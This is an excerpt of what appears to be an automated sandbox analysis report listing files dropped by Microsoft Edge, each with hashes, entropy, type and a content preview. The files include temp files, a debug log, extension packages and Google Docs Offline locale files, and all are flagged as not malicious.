                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\c64bf554-6043-48a4-b22e-5e5d4d74a20a.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                  Entropy (8bit):5.4134469202014435
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0FS5Mj0HWXnL5M:JIVuwEw5MUFZLBQLtHcM
                                                                                                                                                                                                                                                                  MD5:B5F29C20B4FC5CE0B4298458D30208D4
                                                                                                                                                                                                                                                                  SHA1:9DED4A5F703A4A7DDC8F94947E16DC59B1C7026A
                                                                                                                                                                                                                                                                  SHA-256:5271A80C8FCC9577BCD18B0F979EC475AE142D0387C72F8D9843AE7FA7564454
                                                                                                                                                                                                                                                                  SHA-512:A2AFBB9CA8EBCA04417A5D5DACEF79B0B1F85E8DCE8CD7B946278B359BF387296CE67406579453C69B21F431C7649874B5E74787F52C12CA5969637C98E3DABF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\d1dadf2d-edfc-4f24-af46-64675ee0d4de.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e83689ee-b363-4c38-af92-dea1be264d6e.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 340 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):704145
                                                                                                                                                                                                                                                                  Entropy (8bit):7.998010742509996
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:jUHH5RMls2XC17kU+zthvc2KfTFTi9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:2H5RMOX17OznvSps1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                  MD5:FFFA2DD2049F671D7BC4C39C0210C9B2
                                                                                                                                                                                                                                                                  SHA1:D3C5FEAE339426165A898D7572AE85CEA68DE8C0
                                                                                                                                                                                                                                                                  SHA-256:480EC17C448939F4129A86EA0B51B8FF85F136785E69088F6677E46E3FC81F16
                                                                                                                                                                                                                                                                  SHA-512:E64994B5DFB74E4560F44071A06979D73AE2FC7E2BDEB61E16963965087EDA86A6BD2582ECB381FD8DD7D31C8C9C50B9C322FDFE417D4E3E086F6E4521E18D5D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...T..........f$@....sRGB....... .IDATx^.....Y.....3...{u.m.[X..s.w...'.p...I.;....$.1.#...1...68....l...u..Ziw...3....u?]]...3.+.4..jf.......sUUm.Qo..4.....Y3....*...z..~Z..,....)].....7Z.%.T^G..e^.5..O....n.kV+.*H..F#.3..n...f..z.[+.u..Zh..f~lZ.5....L....SP..8^..3.....V0-.I..K..^Y...N..4..[e...:.>1_j.......i..>...5P..Xg...BO...f.J...Z....D.;......+..P..i._..*...<.E....L........)....~...e`.....%@....j...R.x.0~...n..n.`{r.5...-NB..1..U.,..._5^.*T...sL.w......=...@Z.....&S@..P...g...A.~.\.$%U....Z[.,.k.....4..<..H.sU.5.d....v..b...].W..v@...."o......6.:...n,+3..6Q.@.../..^..;....VPT{.0.A..lYWw...v..........K..6/).O..p#.A.'q...^.j.......F.;....J,F..q&.FCU......_...._m......g.WtM........ ..iT."....])d..AA7i..=R'.P.l.C..y..3.cU.D."5.{q....T...m..[...)....&......V.Z...k.@.R|.h^]S{5...i...A'...6[..~...5.BU....P;cR...a?@m/.._...i_a.~... B_a6:@.....d...N)i?K....9..'s..i./Z*.|..h.WQ.CMm.].DE.+*lK. ..'.....6Em..k.E..@..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\2e394d85-dadc-4bf8-b29b-63dee875f311.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
